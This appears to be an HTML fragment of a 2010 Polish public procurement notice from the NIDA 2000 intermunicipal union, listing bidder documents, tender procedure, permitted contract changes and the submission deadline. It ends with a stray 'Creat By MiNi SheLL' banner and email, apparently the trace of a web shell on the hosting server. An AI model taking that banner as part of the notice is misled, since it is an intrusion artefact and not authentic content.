<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza sie zmiany wynikające  z następujących sytuacji:

I.	Zmiana terminu realizacji przedmiotu umowy spowodowana:  
1. 	warunkami atmosferycznymi:
a)	klęski żywiołowe;
b)	warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych, realizację usług lub dostarczenie przedmiotu dostawy, w tym przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów - to jest wystąpienie średniodobowej temperatury poniżej minus 10 stopni Celsjusza w okresie dłuższym niż 14 dni.
2. 	warunkami geologicznymi, terenowymi, archeologicznymi, wodnymi itp., w szczególności:
a)	odmienne od przyjętych w dokumentacji projektowej warunki geologiczne (kategorie gruntu, skał,  itp.) pod warunkiem wystąpienia kategorii gruntu równej lub większej od kategorii VI na łącznej długości co najmniej 10 % całego zakresu robót;
b)	odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych;
c)	niewypały i niewybuchy, zagrożenie tąpnięciami, wybuchem;
d)	wykopaliska archeologiczne, szkody górnicze, 
-	nie przewidywane w SIWZ.
3. 	zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności:
a)	wstrzymanie realizacji umowy przez Zamawiającego;
b)	konieczność wprowadzenia zmian w  dokumentacji projektowej lub dokumentacji technicznej urządzeń; 
4.	zmiany będące następstwem działania organów administracji, w szczególności:
a)	przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń, itp.;
b)	odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej,
c)	konieczność uzyskania wyroku sądowego, lub innego orzeczenia sądu lub organu, którego konieczności nie przewidywano przy zawieraniu umowy;
d)	konieczność zaspokojenia roszczeń lub oczekiwań osób trzecich - w tym grup społecznych lub zawodowych nie artykułowanych lub nie możliwych do jednoznacznego określenia w chwili zawierania umowy;
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w punktach I.1., I.2. i I.3.b), termin wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności i nie dłużej niż o 3 miesiące. W przypadku okoliczności opisanych w punktach I.3.a) oraz I.4. lit. a), b), c), d), termin zakończenia umowy może być przedłużony o czas trwania tych okoliczności niezależnie od czasu ich trwania.
II.	Zmiany osobowe:
a)	zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w ustawie Prawo budowlane, prawo geologiczne i górnicze  lub innych ustawach, 
b)	zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy, a od których wymagano określonego doświadczenia lub wykształcenia na inne legitymujące się doświadczeniem lub wykształceniem spełniającym wymóg SIWZ
c)	zmiana o, której mowa w lit b) będzie niemożliwa, w przypadku gdy dotyczy osoby ocenianej na podstawie podmiotowych kryteriów oceny ofert, chyba że w zamian za taką osobę zostanie zaproponowana osoba o doświadczeniu lub wykształceniu co najmniej takim samym jakie posiada osoba, zamieniana. 
III.     Zmiana płatności
a)	zmiany terminów płatności wynikające z wszelkich zmian wprowadzanych do umowy, a także zmiany samoistne o ile nie spowodują konieczności zapłaty odsetek lub wynagrodzenia w większej kwocie wykonawcy;
b)	miarkowanie wysokości kar umownych w okolicznościach wskazywanych w odpowiednich przepisach kodeksu cywilnego.
IV.    Pozostałe zmiany 
a.	zmiana obowiązującej stawki VAT; Jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego przez wykonawcę;
b.	zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu;
c.	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami; 
d.	wydłużenie okresu  rękojmi, o dowolny okres.
V. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.nida2000.realnet.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Związek Międzygminny NIDA 2000, Stary Korczyn; 28-136 Nowy Korczyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.08.2010 godzina 13:00, miejsce: Związek Międzygminny NIDA 2000, Stary Korczyn; 28-136 Nowy Korczyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane ze środków UE w ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com